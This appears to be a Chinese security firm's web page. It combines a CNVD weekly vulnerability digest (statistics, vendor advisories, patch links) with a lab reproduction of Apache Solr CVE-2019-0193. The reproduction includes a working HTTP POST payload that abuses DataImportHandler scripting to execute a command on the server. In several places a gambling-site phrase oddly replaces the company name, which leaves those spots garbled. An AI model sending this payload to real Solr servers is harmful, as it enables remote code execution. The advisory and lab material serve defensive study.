安全周报

作者:  /  来源:  /  时间:2019/12/6 10:25:36  /  阅读:99次

2019年络安安全周报第45期(1)_页面_01.jpg



  • 本周安全漏洞态势研判情况

 

本周网络安全漏洞威胁整体评价级别为:

 

  • 本周漏洞按类型和厂商统计

 

 

本周,CNVD收录了402个漏洞。应用程序304个,操作系统35个,网络设备(交换机、路由器等网络端设备)30个,WEB应用24个,智能设备(物联网终端设备)5个,安全产品4个。

表1 漏洞按影响类型统计表

漏洞影响对象类型

漏洞数量

应用程序

304

WEB应用

24

网络设备(交换机、路由器等网络端设备)

30

操作系统

35

安全产品

4

智能设备(物联网终端设备)

5

图1 本周漏洞按影响类型分布

                                              1.jpg

漏洞涉及Intel、CloudBees、Microsoft等多家厂商的产品,部分漏洞数量按厂商统计如表2所示

表2 漏洞产品涉及厂商分布统计表

序号

厂商(产品)

漏洞数量

所占比例

1

Intel

37

9%

2

CloudBees

36

9%

3

Microsoft

21

6%

4

GitLab

20

5%

5

Linux

17

4%

6

Google

16

4%

7

WordPress

12

3%

8

Centreon

11

3%

9

Technicolor

10

2%

10

其他

309

55%

 

  • 本周行业漏洞收录情况

 

本周,CNVD收录了17个电信行业漏洞,6个移动互联网行业漏洞,4个工控行业漏洞(如下图所示)。其中,“Cisco IOS XE拒绝服务漏洞(CNVD-2019-42591)、Grandstream UCM6204命令注入漏洞、ABB Power Generation Information Manager (PGIM) and Plant Connect安全验证绕过漏洞、3S-Smart Software Solutions CODESYS 缓冲区错误漏洞、多款Huawei产品不恰当授权漏洞”等漏洞的综合评级为“高危”。相关厂商已经发布了漏洞的修补程序,请参照CNVD相关行业漏洞库链接。

电信行业漏洞链接:http://telecom.cnvd.org.cn/

移动互联网行业漏洞链接:http://mi.cnvd.org.cn/

工控系统行业漏洞链接:http://ics.cnvd.org.cn/

2.jpg

图2 电信行业漏洞统计

3.jpg

图3 移动互联网行业漏洞统计

4.jpg

图4 工控系统行业漏洞统计

  • 本周重要漏洞安全告警

1Microsoft产品安全漏洞

Microsoft Windows和MicrosoftWindows Server都是美国微软(Microsoft)ca88会员登录入口电脑版 的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Windows Hyper-V是其中的一个虚拟化产品,支持在Windows中创建虚拟机。Microsoft Edge是一款Windows 10之后版本系统附带的Web浏览器。本周,上述产品被披露存在多个漏洞,攻击者可利用漏洞执行任意代码,导致主机服务器崩溃等。

相关漏洞包括:Microsoft Windows Hyper-V拒绝服务漏洞(CNVD-2019-42609、CNVD-2019-42610、CNVD-C-2019-194159、CNVD-C-2019-194158)、Microsoft Windows Hyper-V远程代码执行漏洞(CNVD-2019-42611、CNVD-2019-42612、CNVD-2019-42608)、Microsoft Edge脚本引擎内存破坏漏洞(CNVD-2019-42802)。其中,“Microsoft Windows Hyper-V远程执行代码漏洞(CNVD-2019-42608、CNVD-2019-42611、CNVD-2019-42612)、Microsoft Edge脚本引擎内存破坏漏洞(CNVD-2019-42802)”的综合评级为“高危”。目前,厂商已经发布了上述漏洞的修补程序。络安提醒用户及时下载补丁更新,避免引发漏洞相关的网络安全事件。

参考链接:

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42607

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42608

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42609

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42610

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42611

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42612

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42613

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42802

2、Cisco产品安全漏洞

CiscoMDS 9000 Series Multilayer Switches等都是美国思科(Cisco)ca88会员登录入口电脑版 的产品。Cisco MDS 9000 SeriesMultilayer Switches是一款MDS 9000系列多层交换机。Cisco Nexus 7000 Series Switches是一款7000系列交换机。Cisco Nexus 7700 SeriesSwitches是一款7700系列交换机。Cisco Nexus 3000 Series Switches是一款3000系列交换机。Cisco Nexus 3500 PlatformSwitches是一款3500系列平台交换机。Cisco Nexus 3600 Platform Switches是一款3600系列平台交换机。Cisco NX-OS Software是一套交换机使用的数据中心级操作系统软件。Cisco IOS XE是一套为其网络设备开发的操作系统。Cisco Integrated Management Controller (IMC) Supervisor是一套机架式服务器集中管理系统。Cisco UCS Director是一套私有云基础架构即服务(IaaS)的异构平台。Cisco UCS Director Expressfor Big Data是一套针对大数据集群的基础架构统一管理平台。Cisco UnifiedCommunications Manager(CUCM,Unified CM,CallManager)是美国思科(Cisco)ca88会员登录入口电脑版 的一款统一通信系统中的呼叫处理组件。该组件提供了一种可扩展、可分布和高可用的企业IP电话呼叫处理解决方案。本周,上述产品被披露存在多个漏洞,攻击者可利用漏洞获取访问权限,执行任意命令,导致拒绝服务等。

相关漏洞包括:Cisco NX-OS Software CLI命令注入漏洞、Cisco IOS XE拒绝服务漏洞(CNVD-2019-42591)、Cisco Integrated Management Controller Supervisor、Cisco UCS Director和Cisco UCS Director Expressfor Big Data信任管理问题漏洞、Cisco IntegratedManagement Controller Supervisor、CiscoUCS Director和Cisco UCS Director Express for Big Data输入验证错误漏洞、Cisco Integrated Management Controller Supervisor、Cisco UCS Director和Cisco UCS Director Expressfor Big Data身份验证绕过漏洞、Cisco NX-OS和Cisco IOS XE数据伪造问题漏洞、Cisco NX-OS Software操作系统命令注入漏洞、Cisco Unified Communications Manager SQL注入漏洞(CNVD-2019-42752)。上述漏洞的综合评级为“高危”。目前,厂商已经发布了上述漏洞的修补程序。络安提醒用户及时下载补丁更新,避免引发漏洞相关的网络安全事件。

参考链接:

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42590

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42591

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42592

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42593

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42594

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42596

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42597

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42752

3Intel产品安全漏洞

IntelConverged Security and Management Engine(CSME)和Intel TXE等都是美国英特尔(Intel)ca88会员登录入口电脑版 的产品。Intel Converged Security and Management Engine是一款安全管理引擎。Intel TXE是一款使用在CPU(中央处理器)中具有硬件验证功能的信任执行引擎。Intel Active ManagementTechnology(AMT)是一套以硬件为基础的计算机远程主动管理技术软件。Intel Graphics Driver是Intel显卡驱动程序。本周,上述产品被披露存在多个漏洞,攻击者可利用漏洞获取敏感信息,提升权限,导致拒绝服务。

相关漏洞包括:Intel Graphics Driver内存破坏漏洞(CNVD-2019-42247)、Intel Graphics Driver代码问题漏洞、Intel Active Management Technology权限提升漏洞(CNVD-2019-42601、CNVD-2019-42606、CNVD-2019-42598)、Intel Converged Securityand Management Engine和Intel TXE缓冲区溢出漏洞、Intel Converged Security and Management Engine权限提升漏洞、Intel Active Management Technology信息泄露漏洞。其中,除“Intel Graphics Driver代码问题漏洞、Intel Active Management Technology权限提升漏洞(CNVD-2019-42601、CNVD-2019-42598)”外的综合评级为“高危”。目前,厂商已经发布了上述漏洞的修补程序。络安提醒用户及时下载补丁更新,避免引发漏洞相关的网络安全事件。

参考链接:

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42247

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42248

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42601

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42598

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42600

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42603

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42606

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42605

4WordPress产品安全漏洞

WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。contact-form-multi是使用在其中的一个联系表单自定义插件。custom-admin-page是使用在其中的一个自定义后台管理页面插件。contact-form-7-sms-addon是使用在其中的一个短消息提醒插件。wp-support-plus-responsive-ticket-system是使用在其中的一个票务系统插件。plugmatter-optin-feature-box-lite是使用在其中的一个功能列表插件。本周,上述产品被披露存在多个漏洞,攻击者可利用漏洞获取敏感信息,执行客户端代码等。

相关漏洞包括:WordPresscontact-form-multi插件跨站脚本漏洞、WordPresscustom-admin-page插件跨站脚本漏洞、WordPresscontact-form-7-sms-addon插件跨站脚本漏洞、WordPresswp-support-plus-responsive-ticket-system插件路径遍历漏洞、WordPress wp-support-plus-responsive-ticket-system插件信息泄露漏洞、WordPress wp-support-plus-responsive-ticket-system插件SQL注入漏洞、WordPressplugmatter-optin-feature-box-lite插件SQL注入漏洞(CNVD-2019-42838)、WordPress download-plugins-dashboard插件跨站脚本漏洞。其中,“WordPress wp-support-plus-responsive-ticket-system插件SQL注入漏洞、WordPressplugmatter-optin-feature-box-lite插件SQL注入漏洞(CNVD-2019-42838)”的综合评级为“高危”。目前,厂商已经发布了上述漏洞的修补程序。络安提醒用户及时下载补丁更新,避免引发漏洞相关的网络安全事件。

参考链接:

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42037

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42039

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42038

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42043

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42044

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42045

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42838

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42840

5Linux kernel内存破坏漏洞(CNVD-2019-42788)

Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。本周,Linux kernel被披露存在内存破坏漏洞。攻击者可利用该漏洞创建原始套接字。目前,厂商尚未发布上述漏洞的修补程序。络安提醒广大用户随时关注厂商主页,以获取最新版本。

参考链接:

http://www.cnvd.org.cn/flaw/show/CNVD-2019-42788

更多高危漏洞如表3所示,参考链接:

http://www.cnvd.org.cn/flaw/list.htm

漏洞名称

综合评级

修复方式

Centreon SQL注入漏洞

厂商已发布了漏洞修复程序,请及时关注更新:https://github.com/centreon/centreon/pull/7862

Eclipse   Jetty缓冲区溢出漏洞

目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页:
  https://www.eclipse.org/jetty/

Linux kernel空指针解引用漏洞(CNVD-2019-42388)

厂商已发布了漏洞修复程序,请及时关注更新:
  https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.195

多款Huawei产品不恰当授权漏洞

厂商已发布了漏洞修复程序,请及时关注更新:
  https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20191113-01-homerouter-cn

ABB Power Generation Information Manager (PGIM) and Plant   Connect安全验证绕过漏洞

厂商已发布了漏洞修复程序,请及时关注更新:
  https://www.abb.com

3S-Smart Software Solutions CODESYS 缓冲区错误漏洞

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
  https://customers.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-10_CDS-68341.pdf

Google Chrome资源管理错误漏洞(CNVD-2019-42756)

厂商已发布了漏洞修复程序,请及时关注更新:
  https://chromereleases.googleblog.com/2019/07/stable-channel-update-for-desktop.html

NVIDIA Windows GPU Display Driver DirectX驱动缓冲区溢出漏洞(CNVD-2019-42771)

厂商已发布了漏洞修复程序,请及时关注更新:
  https://nvidia.custhelp.com/app/answers/detail/a_id/4841/

Apache Commons Beanutils代码问题漏洞

厂商已发布了漏洞修复程序,请及时关注更新:https://issues.apache.org/jira/browse/BEANUTILS-520

GitLab访问控制错误漏洞(CNVD-2019-43040)

厂商已发布了漏洞修复程序,请及时关注更新:
  https://about.gitlab.com/2019/03/14/gitlab-11-8-2-released/

表3 部分重要高危漏洞列表

小结:本周,Microsoft产品被披露存在多个漏洞,攻击者可利用漏洞执行任意代码,导致主机服务器崩溃等。此外,Cisco、Intel、WordPress等多款产品被披露存在多个漏洞,攻击者可利用漏洞获取敏感信息,执行任意命令,提升权限,导致拒绝服务等。另外,Linux kernel被披露存在内存破坏漏洞。攻击者可利用该漏洞创建原始套接字。建议相关用户随时关注上述厂商主页,及时获取修复补丁或解决方案。

本文章参考数据来源:https://www.cnvd.org.cn/webinfo/show/5305

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

CVE-2019-0193:Apache Solr 漏洞复现

前言

近日,Apache Solr官方发布Apache Solr存在远程代码执行漏洞的公告,攻击者成功利用该漏洞可执行远程代码,漏洞编号:CVE-2019-0193,安全级别为“高危”。

漏洞介绍

Apache Solr是一款开源、使用Java5语言开发的基于Lucene的全文搜索服务器,是独立的企业级搜索应用服务器。因其高效灵活的缓存功能、垂直搜索功能、高亮显示的搜索结果功能以及基于Web的管理界面等特性被广泛应用于企业中。

Apache Solr存在远程代码执行高危漏洞,漏洞源于该服务器中的DataImportHandler模块启用时,不安全的"dataConfig"参数配置允许执行恶意构造的脚本代码。成功利用该漏洞可导致远程代码执行。基于全球使用该组件用户的数量,恶意攻击者可能会开发针对该漏洞的自动化攻击程序,实现漏洞利用成功后植入后门程序,并进一步释放矿工程序或DDOS僵尸木马等恶意程序,从而影响到设备正常运行。

影响范围

8.2.0之前版本。

修复方案

请受影响用户立即升级Apache Solr至8.2.0版本。Apache Solr历史上已预警多个安全漏洞,建议使用该产品的用户经常关注官方安全更新公告。

升级链接:

http://lucene.apache.org/solr/downloads.html

复现过程

先下载solr环境,下载链接:https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

本地解压后通过cmd先进入solr-7.7.2目录,

然后输入指令.\bin\solr.cmd -e dih,可以看到端口为8983

5.jpg

接下来输入指令curl http://127.0.0.1:8983/solr/admin/cores来获取core信息,注意name为atom,在浏览器端访问http://127.0.0.1:8983/solr/admin/cores也可以获取到core信息

6.jpg

7.jpg

然后我们打开burp suite并在重发器模块输入以下内容:

POST /solr/<your_core_name>/dataimport HTTP/1.1

Host: 127.0.0.1:8983

Content-Length: 763

User-Agent: Mozilla/5.0

Content-type: application/x-www-form-urlencoded

Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=

<dataConfig>

<dataSource type="URLDataSource"/>

<script><![CDATA[

function poc(row){

var process= java.lang.Runtime.getRuntime();

process.exec("calc");

return row;

}

]]></script>

<document>

<entity name="stackoverflow"

url="https://stackoverflow.com/feeds/tag/solr"

processor="XPathEntityProcessor"

forEach="/feed"

transformer="script:poc" />

</document>

</dataConfig>

注意要将以上内容里的两处<your_core_name>改为刚开始获得到的name:atom

效果如下:

8.jpg

然后点击发送,会让填写目标详情,填写的主机为127.0.0.1,端口为8983

9.jpg

填完后点击0k,再点击burusuite的发送按钮,会自动显示如下效果:

10.jpg

即获取了响应内容和自动显示出了计算机框

至此成功复现该漏洞。

 



1575598673.jpg

上海ca88会员登录入口电脑版 技术有限ca88会员登录入口电脑版  Copyright © 2016 Shanghai LuoAn Information & Technology Co.,Ltd. All rights Reserved.

沪公网安备 31011502001353号

 沪ICP备05035588号-9
上海ca88会员登录入口电脑版 技术有限ca88会员登录入口电脑版